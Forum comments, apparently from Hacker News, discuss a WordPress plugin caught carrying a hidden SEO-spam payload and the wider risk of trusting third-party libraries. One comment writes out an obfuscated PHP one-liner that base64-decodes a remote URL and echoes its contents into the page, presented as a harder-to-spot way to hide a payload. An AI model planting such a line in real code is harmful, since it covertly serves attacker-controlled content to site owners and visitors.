For a "hidden" payload, it looks awfully complicated and long. This could've been accomplished with a simple one-liner that would've been easier to hide:<p><pre><code> echo @file_get_contents(base64_decode("aHR0cDovL2kuYWF1ci5uZXQvaS5waHA="));
</code></pre>
Plus it may have looked like "black magic" to someone not acquainted with @-prefixed functions in PHP and base64 =)<p>> It’s the fact that the malicious payload found it’s way in the core files. It was then uploaded to the WordPress.org Plugin Repository.<p>I second this fear.
Many of us would be quick to dismiss this issue (Call me biased, but I don't see this gaining as much "traction" as the crisis we had when RubyGems was compromised) because "PHP is bad and you should feel bad" or "WordPress users can't code", but this is not "a repository is being hacked", this is "a plugin with malicious code has been uploaded ready to be used". This is exactly the same as a npm module handling payments gaining a 20-lines payload sending critical infos to parts unknown when bumping from 1.0.1 to 1.0.2: a plugin developer pushed corrupt code to be used in production (though there is nothing about it, I hope this happened without malice on this person's behalf).<p>This makes me seriously wonder: how many of us ACTUALLY "dive" into the libraries we use day-to-day in production apps? How many of us read every part of these libraries when we don't need to understand/debug them?<p>The last time you used Boost Threads, did you read (and understood) their source code? What about Express or Mongoose in your Node.js-powered E-commerce web app? Or your RoR app using Mongoid?<p>Waiting for input, opinions, advices, best practices and the like.
Some sophisticated SEO link spam for 'pay day loans'<p>Out of curiosity, I looked up that particular pay day loan site's backlink profile. They went from having zero websites linking to them to around 250,000 in the matter of a few hours. All of the links had anchor text with some variation of 'payday loans' or 'payday loans UK'<p>Here's a screenshot of their backlink increase: <a href="http://i.imgur.com/Qo20DkL.png" rel="nofollow">http://i.imgur.com/Qo20DkL.png</a><p>Doesn't look like they are ranking on page 1 yet for any of those terms, which is good. Hopefully Google is on to them.
You can read the orignal plugin author's response here: <a href="http://wordpress.org/support/topic/plugin-social-media-widget-php-notice-undefined-index-pinterest-on-line-66" rel="nofollow">http://wordpress.org/support/topic/plugin-social-media-widge...</a>
It has been removed from wordpress.org. The support page is working, though:<p><a href="http://wordpress.org/support/plugin/social-media-widget" rel="nofollow">http://wordpress.org/support/plugin/social-media-widget</a>